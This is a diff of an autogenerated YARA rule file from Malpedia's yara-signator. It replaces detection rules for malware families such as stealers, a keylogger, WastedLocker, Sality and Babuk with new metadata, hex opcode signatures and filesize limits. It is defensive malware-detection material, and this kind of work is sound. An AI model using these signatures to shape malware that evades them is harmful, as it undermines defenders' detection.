-rule MALPEDIA_Win_Unidentified_041_Auto : FILE
+rule MALPEDIA_Win_Winsloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b9d7c571-d170-593a-8f70-0469676cb185"
+		id = "2a9fc14a-5291-5130-a2b1-9b0355619f7f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_041_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.winsloader_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "f4d0787e07f3ceed2cd8cf3663fb1191bdc709f813ee4ffdf4c24d0d1a2d3c75"
+		logic_hash = "55e07c31479b98d0a2305c5dcdb238979b21006495ecfde106eb27274a497408"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131194,19 +131659,25 @@ rule MALPEDIA_Win_Unidentified_041_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf0 8d45f4 50 8d45f0 50 56 8d45f8 }
-		$sequence_1 = { 64a300000000 8bf1 33ff 8d4c2418 897c240c e8???????? }
-		$sequence_2 = { ffb5f8bfffff ff15???????? eb67 8d85fcbfffff 50 57 57 }
-		$sequence_3 = { 6a4a 66894588 83c07d 6689458a 58 6a08 6689458c }
-		$sequence_4 = { ff75fc 56 e8???????? 59 59 2bf7 5f }
-		$sequence_5 = { eb57 8b45f8 85c0 0f8487000000 8365e000 85c0 7420 }
-		$sequence_6 = { 50 8d4b04 c78424d400000003000000 e8???????? 83bc248400000010 0f82c1040000 ff742470 }
-		$sequence_7 = { ffd6 8bd0 8d4dc0 e8???????? 68???????? 8bd0 c645fc01 }
-		$sequence_8 = { 0f43cf b8???????? 2bc1 50 8d45bc }
-		$sequence_9 = { 3905???????? 7f2a 3d00010000 7d23 8b5218 85d2 0f849f000000 }
+		$sequence_0 = { 52 e8???????? 68???????? 8d743e06 e8???????? }
+		$sequence_1 = { 83c40c 6800040000 8d8dfcf7ffff 51 }
+		$sequence_2 = { e8???????? 66898435fcfbffff b8???????? 83c410 8d4801 8da42400000000 }
+		$sequence_3 = { 8d95fcfbffff 52 0590120000 b920010000 }
+		$sequence_4 = { 84d2 75f9 2bc7 8bf8 b8???????? 8d5001 }
+		$sequence_5 = { 2bc1 0fb7c0 57 8bf8 }
+		$sequence_6 = { 57 8d45dc 50 8d4e10 51 }
+		$sequence_7 = { b8???????? 8d7801 8a10 40 84d2 }
+		$sequence_8 = { 75f9 2bc6 0fb6f0 8d5601 52 88841dfefbffff }
+		$sequence_9 = { 8d0485f83a0110 50 8d85c0f8ffff 03c7 50 e8???????? 8b85bcf8ffff }
+		$sequence_10 = { 83c40c 0fb795f0f3ffff 0395f8f3ffff 8995f8f3ffff }
+		$sequence_11 = { 8b74241c 8bcf 2bf7 8bd3 8a040e 8d4901 8841ff }
+		$sequence_12 = { e9???????? c745e0547c0110 eba2 894ddc c745e0547c0110 e9???????? c745dc03000000 }
+		$sequence_13 = { be???????? f3a5 66a5 a4 8b8decf3ffff 81c1df000000 }
+		$sequence_14 = { 83c201 8995a4f3ffff 8b85b0f3ffff 8a08 }
+		$sequence_15 = { 83e03f c1ff06 6bd830 8b04bdc0c00110 }
 
 	condition:
-		7 of them and filesize < 1097728
+		7 of them and filesize < 270336
 }
 rule MALPEDIA_Win_Prometei_Auto : FILE
 {
@@ -131253,18 +131724,18 @@ rule MALPEDIA_Win_Prometei_Auto : FILE
 	condition:
 		7 of them and filesize < 51014656
 }
-rule MALPEDIA_Win_Troll_Stealer_Auto : FILE
+rule MALPEDIA_Win_Mediapi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b3bc43a0-20cb-5f37-a32c-9a34ea4e289e"
+		id = "aef2b227-dc8a-5a2e-a50c-294091b1c8ca"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.troll_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.troll_stealer_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mediapi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mediapi_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "1fcbf79446deea8c1ec8b5953d0db65f84994139955c1cee9bca8fc3f0d1ce3f"
+		logic_hash = "05b9f202f6ca93b9b901cbe156248c6d5653f1e57951835cd81ee0a4bf1d3fbf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131278,32 +131749,32 @@ rule MALPEDIA_Win_Troll_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81f3fa726602 f9 f7d3 d1cb f9 4153 }
-		$sequence_1 = { 4080ff09 4584c0 4863d2 f5 41f7c05471e21e 4584d2 }
-		$sequence_2 = { 400f91c7 66f7d7 490fb7ff 9c 480fbffc 418f00 ffc7 }
-		$sequence_3 = { 4151 313424 6641ffc1 41b1aa 4159 4863f6 f8 }
-		$sequence_4 = { 4180fede 4d3bf8 05963b2855 d1c8 80fc60 f9 48f7c1f132aa0d }
-		$sequence_5 = { 490fb3e0 44311c24 4d0fa4c032 4523c6 4158 4d63db 443ac0 }
-		$sequence_6 = { 49c1c824 448ac6 66410fabd8 313424 4158 66453bea 4863f6 }
-		$sequence_7 = { c1e004 660fb6df 660fa3c3 23f2 b326 4863d8 }
-		$sequence_8 = { 6681cf754d 4981c006000000 66418928 66d3e7 4981ea04000000 413add 480fa3ef }
-		$sequence_9 = { 66410fbaf9e4 410fb3d9 488b6c25f8 41d2c9 4d1bc3 4889442500 4c8bcd }
+		$sequence_0 = { 488945e0 48837de000 7439 c745f800000000 }
+		$sequence_1 = { 0fb645d9 8d148500000000 0fb645da 0fb6c0 }
+		$sequence_2 = { 0fb645f8 89c1 e8???????? 0fb645f8 89c1 }
+		$sequence_3 = { 4801d0 8b55fc c1e202 83c201 89d1 488b5510 4801ca }
+		$sequence_4 = { 3c2f 0f8558010000 8b45f8 8d5001 8955f8 }
+		$sequence_5 = { 89c1 e8???????? 0fb6c0 89c1 e8???????? 31c3 }
+		$sequence_6 = { 0fb645db 0fb6c0 c1f802 83e00f 01d0 }
+		$sequence_7 = { 3b45f8 7dac eb2e 488b45e8 488d5001 }
+		$sequence_8 = { 488b7308 488b4310 4839f0 7420 488d4608 b908000000 48894308 }
+		$sequence_9 = { 0fb6c0 89c1 e8???????? 0fb645fb 89c1 e8???????? 0fb6c0 }
 
 	condition:
-		7 of them and filesize < 45868032
+		7 of them and filesize < 246784
 }
-rule MALPEDIA_Win_Orchard_Auto : FILE
+rule MALPEDIA_Win_Keylogger_Apt3_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "17f17024-3843-5eab-9d60-b1508d38046a"
+		id = "871f2218-1f0d-5644-a123-b9ca7ac01c6c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.orchard_auto.yar#L1-L153"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.keylogger_apt3_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "138080fd95f8adafa6f2759bdbd81f59c5234a21d6fcbf8907de2c121b106fe9"
+		logic_hash = "23fd7cba40859fc906b768d58d83d5a417832be7f192d8e12b9ebc03b321149b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131317,38 +131788,32 @@ rule MALPEDIA_Win_Orchard_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b07 8b4804 8d41e0 894439fc c745fc07000000 }
-		$sequence_1 = { 6a00 83c804 50 e8???????? 8b55e0 8b7de8 }
-		$sequence_2 = { 83c404 e8???????? 99 b95b000000 f7f9 }
-		$sequence_3 = { 8b7c2424 89542428 8b54240c 83d200 }
-		$sequence_4 = { 83c318 897730 83c404 895f38 }
-		$sequence_5 = { 8b75a8 46 56 e8???????? }
-		$sequence_6 = { 50 ff15???????? 83f805 7507 }
-		$sequence_7 = { 56 ff15???????? ff15???????? 50 6a00 68ffff1f00 }
-		$sequence_8 = { f7f9 81c2d0070000 52 ffd6 }
-		$sequence_9 = { 83c223 2bc1 83c0fc 83f81f 0f877e030000 }
-		$sequence_10 = { 8b07 6a08 895de0 8b4004 }
-		$sequence_11 = { 8b8550fdffff 83e001 0f8412000000 83a550fdfffffe }
-		$sequence_12 = { 83c404 8d4718 897034 8d5804 }
-		$sequence_13 = { 8d442410 50 ff15???????? 6685c0 }
-		$sequence_14 = { 8945e0 c7437000000000 c7839000000000000000 c7839400000000000000 }
-		$sequence_15 = { 8bc8 83ec1c c645fc3c 8d8500ffffff }
+		$sequence_0 = { 68???????? 8bd8 e8???????? 83c408 68???????? 68???????? }
+		$sequence_1 = { ffd7 85c0 75ef 56 ffd7 8bf0 }
+		$sequence_2 = { 85f6 75ba 8b4c243c 5e }
+		$sequence_3 = { 8d4c242c 68???????? 51 ffd7 a1???????? }
+		$sequence_4 = { 8b5004 f7da 1ad2 22d1 }
+		$sequence_5 = { 803b00 758d 8b44241c 40 81c614010000 3b442418 }
+		$sequence_6 = { e8???????? 6a00 6a41 68???????? 8d4ddc }
+		$sequence_7 = { 74c9 8b04cd74104300 5f 5e }
+		$sequence_8 = { 7daa 3b5c2420 7419 8b4c2424 51 }
+		$sequence_9 = { 56 8b74240c 57 85f6 742f }
 
 	condition:
-		7 of them and filesize < 4716352
+		7 of them and filesize < 761856
 }
-rule MALPEDIA_Win_Thumbthief_Auto : FILE
+rule MALPEDIA_Win_Sedll_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c07df13f-4d93-5b5e-9219-11a7b6751d3c"
+		id = "ecd5bad1-bc54-5597-9a03-6b9de2dff623"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.thumbthief_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sedll_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "48fc10818492752c11b968a2d68b30a1043a5a183785607a78ccc035f88fcdc3"
+		logic_hash = "fc4557f56af955238bdd97487f20282917cc4ee0a9fe525b8866f2a10d37bfda"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131362,32 +131827,32 @@ rule MALPEDIA_Win_Thumbthief_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d84246c010000 50 8d8424e4000000 50 8d842488010000 50 }
-		$sequence_1 = { f3a5 66318568feffff 66a5 8db56effffff bf0d000000 0fb74602 8d76f6 }
-		$sequence_2 = { e9???????? 8d8d2cffffff e9???????? 8d4d90 e9???????? 8d4dc4 e9???????? }
-		$sequence_3 = { e8???????? 8d8584feffff 50 e8???????? ffb594feffff 8d8da0feffff e8???????? }
-		$sequence_4 = { ff7518 68???????? 57 e8???????? 83c410 e9???????? 8b5040 }
-		$sequence_5 = { ff742438 33c0 85c9 ff7514 0f99c0 8bcf 6a00 }
-		$sequence_6 = { e8???????? c645fc06 8d8d28ffffff e8???????? c645fc07 8d8d3cffffff e8???????? }
-		$sequence_7 = { e8???????? 837db800 8945b0 0f85c0000000 8b4d9c 8b4724 8945ac }
-		$sequence_8 = { e9???????? 8d8d1cffffff e9???????? 8d8d6cffffff e9???????? 8d8d08ffffff e9???????? }
-		$sequence_9 = { 8d8c24f8000000 6a0d e8???????? 68???????? 8d8424f4000000 e9???????? 8d8424c8000000 }
+		$sequence_0 = { 5d c20c00 8b4510 33d2 51 8910 }
+		$sequence_1 = { 8d4590 50 6a00 56 }
+		$sequence_2 = { ff75fc ff15???????? 85f6 7508 }
+		$sequence_3 = { 53 668945f8 a1???????? 660fd645f0 56 8bf1 }
+		$sequence_4 = { 83fb03 7d8b 8b55fc 2bd7 7463 0fb60f }
+		$sequence_5 = { 8b5d14 8bcb 57 e8???????? 8bf8 85ff }
+		$sequence_6 = { 8d857cfeffff 8955f0 6a00 50 }
+		$sequence_7 = { 8bf1 85c0 740a 50 }
+		$sequence_8 = { e8???????? 83c40c 33ff 85db 0f8eca000000 8b45fc 8a0407 }
+		$sequence_9 = { a1???????? 50 8b08 ff5104 33c0 5e 8be5 }
 
 	condition:
-		7 of them and filesize < 4235264
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Svcready_Auto : FILE
+rule MALPEDIA_Win_Wastedlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9d907139-c144-5614-a62a-7c32470debfc"
+		id = "8ef8d9a2-2e74-56fa-b8ce-a112e80f0d26"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.svcready_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wastedlocker_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "d564083fd80540ab82e35300283080c4f0bdfd997ccd9dbb29372661ffd56646"
+		logic_hash = "48bd61023921acb8234a4ca4342276a30ad18fb5b65266be5de19c7db798e757"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131401,32 +131866,32 @@ rule MALPEDIA_Win_Svcready_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33ce 33fd f7d0 c1cd03 8bd1 0bd0 }
-		$sequence_1 = { 8b400c 8b400c 8b7018 89442428 8974242c 8b4e3c 8b543178 }
-		$sequence_2 = { 33cd 33c1 a3???????? 8bc6 33c2 a3???????? 8b442410 }
-		$sequence_3 = { 58 83c23c 03d6 89542420 3bc8 7d35 83f904 }
-		$sequence_4 = { 3905???????? 0f95c0 c3 e9???????? 55 8bec 6a00 }
-		$sequence_5 = { 3315???????? 33d9 8bf2 8bcb 3335???????? 33ca 33ee }
-		$sequence_6 = { 747f 3d00010000 743e 57 56 ff7514 8d44241c }
-		$sequence_7 = { 53 8bd9 c744242000000000 56 8b08 8b4004 }
-		$sequence_8 = { 89442424 8974244c 895c2450 e8???????? 8b4c2424 c6043100 894c243c }
-		$sequence_9 = { 50 ff760c ff15???????? 6a06 8d4c2424 51 }
+		$sequence_0 = { 83c40c 56 8d85b0ebffff 53 }
+		$sequence_1 = { ff75f8 8bc7 2bc6 83c038 50 ff7508 }
+		$sequence_2 = { 8d45fc 50 8975f8 ff15???????? 50 ff7508 ff15???????? }
+		$sequence_3 = { 6808000200 c745f400200000 895df0 ff15???????? }
+		$sequence_4 = { 58 eb0b 8d4d0c 51 50 53 }
+		$sequence_5 = { ff742424 ff15???????? 8bf0 83feff 7428 ff742418 }
+		$sequence_6 = { 8bc3 e8???????? 85c0 7404 8365f000 6a00 8d45f4 }
+		$sequence_7 = { 6a08 eb02 6a57 5e 5f 8bc6 5e }
+		$sequence_8 = { 53 8bf8 ff15???????? eb08 ff15???????? 8bf8 }
+		$sequence_9 = { ff750c 8b4518 ff7508 e8???????? 6800020000 8bf0 8d85f8fdffff }
 
 	condition:
-		7 of them and filesize < 1187840
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Elf_Babuk_Auto : FILE
+rule MALPEDIA_Win_Retro_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8eba83d0-6c95-5d1f-85db-3750f26fdff6"
+		id = "137253c4-c80f-5441-8b2d-57b863c1f908"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.babuk_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.retro_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "a4e1d4252d61243f852bbd89e2ebf51566a3485791e9905d978089b8c49c4cb9"
+		logic_hash = "603d0a826a833e930e158367f2340675f42fda3d145846edecb7422d26e8a466"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131440,32 +131905,32 @@ rule MALPEDIA_Elf_Babuk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 658b0d00000000 8b89fcffffff 3b6108 7678 83ec14 8b442418 8b4c241c }
-		$sequence_1 = { 8b4c2438 890f 8b542444 89570c 8b1d???????? 85db }
-		$sequence_2 = { e8???????? 8b44240c 89442410 8b4c2418 890c24 e8???????? 8b442420 }
-		$sequence_3 = { e8???????? 8b442438 8b4804 90 8b492c 894c2420 e8???????? }
-		$sequence_4 = { c3 658b1d00000000 8b9bfcffffff 8b5b18 8b5b70 8403 890424 }
-		$sequence_5 = { 01d9 8b9c24a8010000 8bbc243c030000 01fb 11cd 8b8c248c010000 8b9c2464020000 }
-		$sequence_6 = { 8b44244c 8b4c2440 31d2 eb06 8d5101 90 89f1 }
-		$sequence_7 = { 895328 8b9424b0000000 8b8c2490000000 01ca 33562c 89532c }
-		$sequence_8 = { 8b5a40 39d8 0f85360f0000 89bc2408020000 81c4dc010000 c3 89c7 }
-		$sequence_9 = { 8b4c2424 01ca 89942444050000 8b8c2490050000 c1e11a 898c2420050000 }
+		$sequence_0 = { e8???????? 8b442434 8b4c2460 03c8 8bc1 89442460 e9???????? }
+		$sequence_1 = { 890a 8b44fdbc 448b44fdac 448d4820 453bc1 7e0f }
+		$sequence_2 = { 4d8bcf 4d8bc6 8bcf e8???????? 0f28742440 4883c450 415f }
+		$sequence_3 = { 488b8b50560000 488d154c810200 448bc0 e8???????? c70620010000 ba08000000 488bcb }
+		$sequence_4 = { e8???????? 83bedc120000ff 7d19 488d154db30300 488d0d9eb80300 41b899020000 e8???????? }
+		$sequence_5 = { 4b8d0408 4883c310 4883c610 f30f5946f4 f30f594ef8 0f14c0 0f14c9 }
+		$sequence_6 = { 3984cfe86c0000 7419 488d151eb90300 488d0d0fbb0300 41b8dc010000 e8???????? 488b5c2440 }
+		$sequence_7 = { 488bd9 e8???????? 85c0 740e f30f1083e4000000 4883c420 5b }
+		$sequence_8 = { 660f7f4c2430 660f6f0d???????? 660f7f442440 660f6f05???????? 660f7f4c2450 660f6f0d???????? 660f7f442460 }
+		$sequence_9 = { 8b4638 85c0 7fc5 48634658 488d0c40 48634664 4803c8 }
 
 	condition:
-		7 of them and filesize < 4186112
+		7 of them and filesize < 1409024
 }
-rule MALPEDIA_Win_Sysraw_Stealer_Auto : FILE
+rule MALPEDIA_Win_Temp_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a136ac6f-472d-54c5-b881-5ee87f9b3845"
+		id = "2b48048b-b096-5784-980a-c1580b4dfd03"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sysraw_stealer_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.temp_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.temp_stealer_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "a39e6a22fe8b2e74d45c7a3cdbaed2c5766660fde9e3c6d0bcfa65b1acb00f24"
+		logic_hash = "2fe51b5c6906bc550bb0cdd93c915effb0d85e2b560daf9bcb0132c66585b9e7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131479,34 +131944,34 @@ rule MALPEDIA_Win_Sysraw_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff5208 8b4510 8b8d7cffffff 8908 8b45fc 8b4dec }
-		$sequence_1 = { 8d9504ffffff 8d8508ffffff 52 8d8d0cffffff }
-		$sequence_2 = { 8d4db8 ff15???????? 8b0b 8d55a4 }
-		$sequence_3 = { 6a03 8d55a4 68???????? 52 897de0 89bd7cffffff }
-		$sequence_4 = { 8d8d54ffffff 50 8d9558ffffff 51 8d855cffffff 52 8d8d60ffffff }
-		$sequence_5 = { 8b00 50 6a01 ff15???????? 56 8945cc }
-		$sequence_6 = { 8945ec e9???????? 6683fe1f 751d 8b4d0c 68???????? }
-		$sequence_7 = { 2bc7 8d4da4 c1e003 51 50 6880000000 53 }
-		$sequence_8 = { 8b5004 894ddc 8b4808 894dd0 8b4814 }
-		$sequence_9 = { ff15???????? 0faff7 0375cc 81e60f000080 }
+		$sequence_0 = { 48896c2410 4889742418 57 4156 4157 4883ec20 4c635a08 }
+		$sequence_1 = { eb1e 498b8ce9f0940400 8a44f938 a840 7508 0c02 8844f938 }
+		$sequence_2 = { 33c0 4d8bca 49f7d9 8d7801 4903c0 493bc3 774a }
+		$sequence_3 = { 488bd0 488d4dd0 e8???????? 448bc6 488d55f0 e8???????? 4c8bc0 }
+		$sequence_4 = { e8???????? 4c8bc0 488d55f0 488d4dd0 e8???????? 488bd0 }
+		$sequence_5 = { 488bd3 4c8d05f6410200 83e23f 488bcb 48c1f906 488d14d2 }
+		$sequence_6 = { 7f34 33d2 4d85c9 7e24 498bcd }
+		$sequence_7 = { 894708 488d5901 41bf20000000 418bc7 48f7e3 498d4fdf 480f40c1 }
+		$sequence_8 = { 83fa08 7d17 4863c2 488d0c80 488d05b39f0300 488d0cc8 }
+		$sequence_9 = { 8d58b0 498bce 448bc3 488d15f8280100 e8???????? 85c0 7429 }
 
 	condition:
-		7 of them and filesize < 1540096
+		7 of them and filesize < 652288
 }
-rule MALPEDIA_Win_Mewsei_Auto : FILE
+rule MALPEDIA_Win_Sality_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "584cb11c-0c0a-56b4-a94f-bac12775ad8c"
+		id = "3651e4ed-4a90-502c-84b3-3270a294a585"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mewsei_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sality_auto.yar#L1-L222"
 		license_url = "N/A"
-		logic_hash = "ee5e42e21ccf04345d72bb9f3d49fdb8dd733d6140538e230075cf58e7ebb4a5"
+		logic_hash = "9a7f5bbeaaf4328c45f3811719f9d62671822ec18ed1403a4d8c0d44848d8fbb"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -131518,32 +131983,46 @@ rule MALPEDIA_Win_Mewsei_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7409 50 e8???????? 83c404 46 3bf3 72eb }
-		$sequence_1 = { 895df4 8b5dfc 8dbc1f4239faff 8b5df4 }
-		$sequence_2 = { c1e810 33d2 25ff7f0000 f7f1 80c230 }
-		$sequence_3 = { ffd6 a1???????? 85c0 7405 6aff }
-		$sequence_4 = { 0bf3 0fb65804 c1e608 0bf3 8b5df8 33df 235dfc }
-		$sequence_5 = { 8b7df8 337df4 8b5df0 237dfc 337df8 037de0 8dbc1f2ac68747 }
-		$sequence_6 = { 85c0 750c 6a01 e8???????? 83c404 ebe7 894610 }
-		$sequence_7 = { 0fb6581c 0bfb 897974 897de8 8b7df0 }
-		$sequence_8 = { 03de 8dbc3b44eabea4 8b5df4 c1c704 03fb 897dfc 8b7df8 }
-		$sequence_9 = { 8bf8 897df8 c70300000000 8d7701 8d4900 56 e8???????? }
+		$sequence_0 = { 6a00 8d85f4efffff 50 6a00 6a00 68???????? }
+		$sequence_1 = { 51 ff15???????? ba01000000 85d2 742e }
+		$sequence_2 = { 837d0804 0f8457020000 837d0803 0f844d020000 e8???????? 25ffff0000 33d2 }
+		$sequence_3 = { 51 ff15???????? c705????????00000000 8d9500f0ffff }
+		$sequence_4 = { 837d0804 0f84e9000000 8b551c 3b5520 }
+		$sequence_5 = { 51 ff15???????? c6850cebffff00 68???????? }
+		$sequence_6 = { 6a00 8d85f4feffff 50 8b8dd0fdffff }
+		$sequence_7 = { 0f8446010000 817d08a2000000 7517 e8???????? }
+		$sequence_8 = { ffe0 58 e9???????? 85c0 }
+		$sequence_9 = { 64ff30 8d8586134000 8920 896804 8d9dba114000 895808 646789260000 }
+		$sequence_10 = { 803fff 75e0 c3 ffb554134000 }
+		$sequence_11 = { c3 50 8d9578274000 52 50 }
+		$sequence_12 = { 03c7 8b00 0344240c eb02 33c0 64678f060000 }
+		$sequence_13 = { 750b 68c0270900 ff9503154000 6a00 }
+		$sequence_14 = { 50 ff954d144000 8d9533164000 52 }
+		$sequence_15 = { c9 c20800 fc b000 }
+		$sequence_16 = { 0fb70c753a174200 8bc6 40 0fb704453a174200 03c8 }
+		$sequence_17 = { ab a1???????? e8???????? c60720 47 50 }
+		$sequence_18 = { e8???????? a3???????? 833d????????00 7439 }
+		$sequence_19 = { 8b00 ebf4 83c008 03c3 5f 5e }
+		$sequence_20 = { 8d856cfeffff 50 a1???????? ff7038 e8???????? }
+		$sequence_21 = { c3 c8040000 53 56 }
+		$sequence_22 = { 56 6800200000 68ff000000 e8???????? }
+		$sequence_23 = { 58 ff30 e8???????? 68???????? e8???????? 0fb745d1 }
 
 	condition:
-		7 of them and filesize < 504832
+		7 of them and filesize < 1523712
 }
-rule MALPEDIA_Win_Bolek_Auto : FILE
+rule MALPEDIA_Win_Nvisospit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "15e34de8-623e-5f2f-9d4c-c44b8f35819d"
+		id = "f5c60665-a01a-5768-8a20-3005a0276675"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bolek_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nvisospit_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "403a7b71c7f1728fba717836e961ac65b351f821c9556b0d1663304cb6494bb7"
+		logic_hash = "bbf068c3d3b2f73248f6b6d32c9808daec6187590ab8231b3d2dc1fe1f513715"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131557,32 +132036,32 @@ rule MALPEDIA_Win_Bolek_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd3 8b45d8 83c40c 0345fc ff75dc ff75f8 50 }
-		$sequence_1 = { 8945ec 85db 744e 48 83c624 f7d0 03fe }
-		$sequence_2 = { eb16 8bc7 8bce c1e110 c1e810 03c1 8d4a01 }
-		$sequence_3 = { e8???????? 83c41c ff75f8 ff15???????? 50 ff15???????? 8b4520 }
-		$sequence_4 = { ff760c e8???????? ff760c e8???????? ff7610 e8???????? 837e1400 }
-		$sequence_5 = { 85c0 0f8432020000 8b75f0 85f6 0f8427020000 56 6a04 }
-		$sequence_6 = { 85c0 7e06 03d8 2bf8 75ea 85ff 751a }
-		$sequence_7 = { ff7610 896c242c 894c2428 e8???????? 83c418 85c0 0f8882000000 }
-		$sequence_8 = { 8955ec 33c9 8945e8 51 50 51 51 }
